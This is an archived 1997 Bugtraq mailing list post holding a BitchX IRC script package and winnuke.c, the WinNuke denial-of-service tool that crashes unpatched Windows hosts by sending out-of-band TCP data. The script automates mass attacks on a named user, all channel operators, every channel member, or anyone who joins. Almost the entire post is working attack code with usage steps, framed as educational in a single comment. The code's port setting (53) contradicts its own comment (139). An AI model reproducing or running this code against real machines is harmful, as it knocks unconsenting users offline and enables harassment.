Bugtraq mailing list archives
BitchX p139 script
From: lerper () ENGULF COM (the lerPer)
Date: Sun, 25 May 1997 00:33:01 -0500
-------------------------------------- ------------wnuke15.irc--------------- # WinNuke BitchX IRC script/wnuke package v 1.5 # Created by maddog and lerper # maddog () bitsmart com, lerper () bitsmart com # WinNuke IRCers with several options: # the nick you define # all of the ops in your current channel # anyone who joins a channel # everyone in the channel # Creditz: # goes out to _eci for winnuke # #BitchX for their great support # #ircII for pretending to be asleep whenever i asked for help # #hack for the laughs (hey--they were talking about vibrators last night) # Micro$oft for hosting the hacking channels on comic chat # KL and his LPLC LAX # shout outs to the L0pht and hey to memebers of "CdC" # notice: this package was created so more people could learn about winnuke # and more winblows users could patch themeslves up. # NOT so lame ircers could have their kicks #Before using this script, compile the included winnuke.c #cc -owinnuke winnuke.c should do the job! #If you have a GNU compiler...replace the cc with gcc #Then move the executable into your /usr/local/bin directory and #chmod it with the access levels you wish. assign wnuke_pgm wnuke assign wn [wnuke w/ mass nuke features] assign wi [winnuke commands] eval echo $wn version 1.5 loading... [ by: maddog and the lerper ] eval echo $wn type /whelp for commands alias whelp { eval echo $wi /wnuke <nick> - sends a win nuke to someone eval echo $wi /mwnuke - sends a win nuke to everyone on a chan eval echo $wi /awnuke - when someone joins, it nukes them too, effective with mwnuke eval echo $wi /opwnuke - sends a win nuke to all ops } alias wnuke { if ([$0]) { ^on ^311 "*" {^assign ndomain $3} ^on ^319 "*" # ^whois $0 wait EVAL ^exec winnuke $1 $ndomain >/dev/null & echo [wnuke] sent wnuke to $0 at $ndomain requested\. ^on 311 - "*" ^on 319 - "*" ^assign -ndomain } { echo echo Usage: /wnuke <nick> } } /on -join * {@joinvar=[$0]} alias awnuke { /on -join * {/wnuke $0}} alias mwnuke { fe ($chanusers()) blah { /wnuke $blah }} alias opwnuke { fe ($chops()) blah { /wnuke $blah }} -------------------------------------- ------------winnuke.c----------------- /* winnuke.c */ /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> #define dport 53 /* Attack port: 139 is what we want */ int x, s; char *str = "Bye"; /* Makes no diff */ struct sockaddr_in addr, spoofedaddr; struct hostent *host; int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; bzero((char *)&blah,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct sockaddr *)&blah,16)==-1) { perror("Win-Nuke failed"); close(sock); return(-4); } printf("Connected to [%s:%d].\n",server,port); return; } void main(int argc, char *argv[]) { if (argc != 2) { printf("Usage: %s <target>\n",argv[0]); exit(0); } if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); exit(-1); } open_sock(s,argv[1],dport); printf("Sending crash... "); send(s,str,strlen(str),MSG_OOB); usleep(100000); printf("Done!\n"); close(s); }
Current thread:
- cfingerd vulnerability, (continued)
- cfingerd vulnerability Rodrigo Barbosa (May 23)
- Re: cfingerd vulnerability Edward S. Marshall (May 24)
- Re: cfingerd vulnerability Ken Hollis (May 24)
- Re: cfingerd vulnerability Alan Brown (May 25)
- Re: cfingerd vulnerability Michael Stone (May 25)
- winnuke in one line of perl5.004 Randal Schwartz (May 25)
- cfingerd vulnerability Rodrigo Barbosa (May 23)
- Re: cfingerd vulnerability Felix von Leitner (May 25)
- Irix buffer overflow in /bin/df David Hedley (May 24)
- Re: Irix buffer overflow in /bin/df J.A. Gutierrez (May 24)
- Irix: Pandora's box opened Yuri Volobuev (May 24)
- BitchX p139 script the lerPer (May 24)
- ANNOUNCE: chkwtmp, a wtmp intrusion detection anaylzer (Linux) Silvio Cesare (May 25)
- Re: ANNOUNCE: chkwtmp, a wtmp intrusion detection anaylzer (Linu Byron COLLIE (May 26)
- ANNOUNCE: riputils (Linux) Silvio Cesare (May 25)
- Re: Irix buffer overflow in /bin/df Lamont Granquist (May 28)